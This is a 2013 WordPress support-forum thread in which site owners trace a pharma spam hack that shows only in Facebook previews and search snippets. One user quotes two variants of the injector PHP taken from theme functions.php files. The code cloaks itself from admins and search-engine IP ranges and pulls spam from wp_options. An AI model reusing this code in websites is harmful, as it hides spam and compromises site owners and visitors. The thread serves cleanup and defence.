Weird pharma hack

Home Forums Support Forum Weird pharma hack

Tagged: , , ,

This topic contains 14 replies, has 6 voices, and was last updated by  Anti-Malware Admin 10 years, 6 months ago.

Viewing 15 posts - 1 through 15 (of 15 total)
  • Author
    Posts
  • July 10, 2013 at 1:59 am #767

    Dougald Lamont
    Member

    I downloaded and ran your software (thanks) but I still have the same problem.

    When I post my page to Facebook, there is a bunch of pharma spam – but I can’t see it on the page, and I can’t find it anywhere in the code.

    For example, when I post:

    http://uxbridgeribfest.com/brett-kingswell-playing-uxbridge-ribfest/

    to Facebook, I get a bunch of the junk in the page summary

    I deleted and re-installed wordpress – maybe it’s in the SQL.

    HELP!

    July 10, 2013 at 7:28 am #769

    Anti-Malware Admin
    Key Master

    This sounds like a conditional ad injection but these pharma hacks vary quite a bit. Can you provide me with WP Admin access to your site?

    You can email your login credentials directly to me so I can look for the infection.

    Aloha, Eli

    July 15, 2013 at 3:19 am #770

    Ida Centner
    Member

    I have this, too.  Were you able to find a resolution?

    I also have the issue with the meta data showing up in google searches.  I believe your plugin located the code in the functions.php file, which I have removed, but I’m not sure how to test that it is completely resolved.  I have read somewhere else about needed to modify/remove database entries.  Do you know about this?  Thanks so much for your expertise!

    July 15, 2013 at 8:14 am #771

    Anti-Malware Admin
    Key Master

    Your site looks clean now from the outside. Check the Health section of Google Webmaster Tools to see if the search engine cache is clean and request a review if it is not.

    July 15, 2013 at 10:58 am #772

    Ida Centner
    Member

    Thanks!  Actually, the site never showed any issues on the outside at all.  A reader emailed us that it was showing pharma-spam on Facebook (like Dougald mentioned in this initial post).

    Also, if you do a search on google, many pages have the pharma-spam in the metadata.  Google never did mark the site as containing malware, so I’m having trouble finding how to request a cache update.  I’ll keep looking, but so far cannot find where to request this.

    Let me know if you have other suggestions, & I’ll keep looking, too.  Thanks for the great plugin!

    July 19, 2013 at 12:47 am #779

    Anti-Malware Admin
    Key Master

    Ida,
    Thanks for providing access to your site. I did some tweaking to my plugin on your site and got it to find and remove that last bit of malicious code in your theme. I think your site is all clean now. Can you try reposting any corrupted entries to Facebook and make sure the new postings do not contain these viagra ads.

    You will also need to get Google to re-index your site. This may take some time but it will help to go to Webmaster Tools and submit a new sitemap and request a review in the Health section if there is any malware listed there.

    If you sill have signs of a current or recurring infection please let me know and I can check your site again.

    Aloha, Eli

    July 19, 2013 at 3:35 pm #782

    Grady Booch
    Member

    I also am trying to unwind this weird pharma hack, which has infected two of my websites (computingthehumanexperience.com and creationsbyjan.com). In both cases, the hack is infecting the functions.php file of my resident themes.

    Your plug in did indeed detect the offending code (which looks like this)
    if (!function_exists(“b_call”)) {
    function b_call() {
    if (!ob_get_level()) ob_start(“b_goes”);
    }
    function b_goes($p) {
    if (!defined(‘wp_m1′)) {
    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists(‘is_user_logged_in’) && is_user_logged_in()) || (!$m = get_option(‘_textalternate2′))) {
    return $p;
    }
    list($m, $n) = @unserialize(trim(strrev($m)));
    define(‘wp_m1′, $m);
    define(‘wp_n1′, $n);
    }
    if (!stripos($p, wp_n1)) $p = preg_replace(“~<body[^>]*>~i”, “$0\n”.wp_n1, $p, 1);
    if (!stripos($p, wp_m1)) $p = preg_replace(“~</head>~”, wp_m1.”\n</head>”, $p, 1);
    if (!stripos($p, wp_n1)) $p = preg_replace(“~</div>~”, “</div>\n”.wp_n1, $p, 1);
    if (!stripos($p, wp_m1)) $p = preg_replace(“~</div>~”, wp_m1.”\n</div>”, $p, 1);
    return $p;
    }
    function b_end() {
    @ob_end_flush();
    }
    if (ob_get_level()) ob_end_clean();
    add_action(“init”, “b_call”);
    add_action(“wp_head”, “b_call”);
    add_action(“get_sidebar”, “b_call”);
    add_action(“wp_footer”, “b_call”);
    add_action(“shutdown”, “b_end”);
    }

    I’m currently throwing all sort of things at the problem. Exploit Scanner uncovered a handful of core wordpress files that should not be there (and I’ve eliminated those) but clearly there’s still something in the database that makes this injected code pop up at random times like a whack-a-mole game. I’ve checked the usual places in the wp-options table (but no joy yet) and i’m about to look through all my plugins for strange code).

    As for the database investigation, I should point out that all the usual table item names that have been typically used in pharma attacks are not present….this current  attack appears to be some new variation.

    Needless to say, this is annoying :-(

    (and thank you, your plugin  helped me  attend to the immediate symptoms….now i just need to find the root of the disease)

    July 19, 2013 at 9:04 pm #784

    Grady Booch
    Member

    Further update on the cleansing of my site….

    I’ve purged what appear all the bogus/changed core files that may have been the cause of the hack, although I’m not completely confident….I need to look through all my plugins. But, most important, I found that this hack is using an entry in the table wp_options to hold a key/value pair, containing the spam message (in reverse, which is a signature of the pharam hack). Specifically, check out the record whose name is _textalternate2 and you’ll see the offending code.

    So, it’s a start…

    July 19, 2013 at 9:27 pm #786

    Anti-Malware Admin
    Key Master

    Grady,
    It sounds like you are on the right track. Your site may already be cleaner than you think. The seemingly random occurrences of this hack may be simply due to caching on either the browser or the web-server side. If you have any caching plugins you should deactivate them.

    Also, check Google Webmaster Tools to see if it shows any infected URLs in the health section. You can also fetch a page from your site as the Google Bot to see if it still contains any malicious code.

    Aloha, Eli

    July 19, 2013 at 11:51 pm #787

    Grady Booch
    Member

    Thanks, Eli!

    BTW, my second site was hacked in a similar albeit subtly different way. In this case, the offending wp_options name/value pair is store in a different place (it’s named _property1) and the code that’s generated that’s injected just after a page’s body is this

     
    if (!function_exists(“b_call”)) {
    function b_call() {
    if (!ob_get_level()) ob_start(“b_goes”);
    }
    function b_goes($p) {
    if (!defined(‘wp_m1′)) {
    $f1 = explode(‘|’, ’3639549952,8191.1123631104,8191.1089052672,8191.1078218752,2047.1078220802,1229.1087381508,1444.3512041472,4095.1113980928,4095.1208926208,16383.1249705984,65535|via translate.google.com,Google WAP Proxy,Google CHTML Proxy|tumblrbot’);
    $f3=0;
    $f2=ip2long($_SERVER["REMOTE_ADDR"]);
    foreach(explode(‘.’, array_shift($f1)) as $line) {
    list($a1,$a2)=explode(‘,’,$line);
    if ($f2>=$a1&&$f2<=($a1+$a2)) {
    $f3=1;
    break;
    }
    }
    foreach(array_reverse($f1,1) as $k=>$v) {
    foreach(explode(‘,’, $v) as $line) {
    if (stripos($_SERVER["HTTP_USER_AGENT"], $line) !== false) {
    $f3=$k;
    break;
    }
    }
    }
    if (!$f3 || isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists(‘is_user_logged_in’) && is_user_logged_in()) || (!$m = get_option(‘_property1′))) {
    return $p;
    }
    list($m, $n) = @unserialize(trim(strrev($m)));
    define(‘wp_m1′, $m);
    define(‘wp_n1′, $n);
    }
    if (!stripos($p, wp_n1)) $p = preg_replace(“~<body[^>]*>~i”, “$0\n”.wp_n1, $p, 1);
    if (!stripos($p, wp_m1)) $p = preg_replace(“~</head>~”, wp_m1.”\n</head>”, $p, 1);
    if (!stripos($p, wp_n1)) $p = preg_replace(“~</div>~”, “</div>\n”.wp_n1, $p, 1);
    if (!stripos($p, wp_m1)) $p = preg_replace(“~</div>~”, wp_m1.”\n</div>”, $p, 1);
    return $p;
    }
    function b_end() {
    @ob_end_flush();
    }
    if (ob_get_level()) ob_end_clean();
    add_action(“init”, “b_call”);
    add_action(“wp_head”, “b_call”);
    add_action(“get_sidebar”, “b_call”);
    add_action(“wp_footer”, “b_call”);
    add_action(“shutdown”, “b_end”);
    }

    but, it has the same effect (the value of the spam was the same for both sites, although the code was different as above and the name of the wp_option item was different.

    July 19, 2013 at 11:52 pm #788

    Grady Booch
    Member

    Last thing before I’m off to bed, for those of you chasing down this same problem..the combination of Eli’s wonderful anti-malware plug in plus the use of the Exploit Scanner plugin are what I’ve used to stamp out this hack.

    Happy hunting…

    July 29, 2013 at 10:02 am #796

    Highgate Builders
    Member

    Howdy!   This thread helped me find the same attack on my website. Many thanks for that.

    FWIW, in my case the wp_options table option_name is “_prevtype1″.

    I noticed your plugin doesn’t touch that mysql db row. Any harm in deleting it, or NOT deleting it?

    Any idea of how the injection is happening yet? I’m running a minimal set of plugins, one user/admin with a very strong password… Probably coming in thru the godaddy shared server setup I’m guessing, but wondered if anybody narrowed it down to a new vulnerability?

    Cheers.

    July 29, 2013 at 2:14 pm #797

    Anti-Malware Admin
    Key Master

    My plugin does not delete anything from the database. Once the malicious PHP code is removed that entry in the wp_options table has no effect. You can (and probably should) delete it just to clean up.

    As far as the source of this infection, It is most likely a shared hosting vulnerability.

    I have recently created a very secure hosting environment to answer this need. After testing this new server for a few months I have created a site and opened registrations to the public. It’s not going to be as cheap as the bulky shared hosting providers out there like GoDaddy and HostGator but it is way more secure.

    You can signup here if interested or contact me directly if you want more info.

    http://yoftp.com/signup/

    Aloha, Eli

    October 5, 2013 at 6:13 am #828

    Daniel Nightingale
    Member

    Hi,

    Today I noticed I also have the same spam when posting a link on facebook, however I can’t seem to locate the problem. Does anyone have any advice. Thanks in advance, I’m not too great at this wordpress lark, Im just using it for my travel blog!!

    Thanks,

    Danny

    October 5, 2013 at 9:21 am #829

    Anti-Malware Admin
    Key Master

    Daniel,
    Have you already removed some threats from your site? Because Facebook actually caches your site, it may take a little while before your post look clean.
    If you have not found anything wrong on the site yet and you need my help to locate the malicious code just send me your WP Admin login and I’ll take a look.

    Aloha, Eli

  • Author
    Posts
Viewing 15 posts - 1 through 15 (of 15 total)

You must be logged in to reply to this topic.

Comments are closed.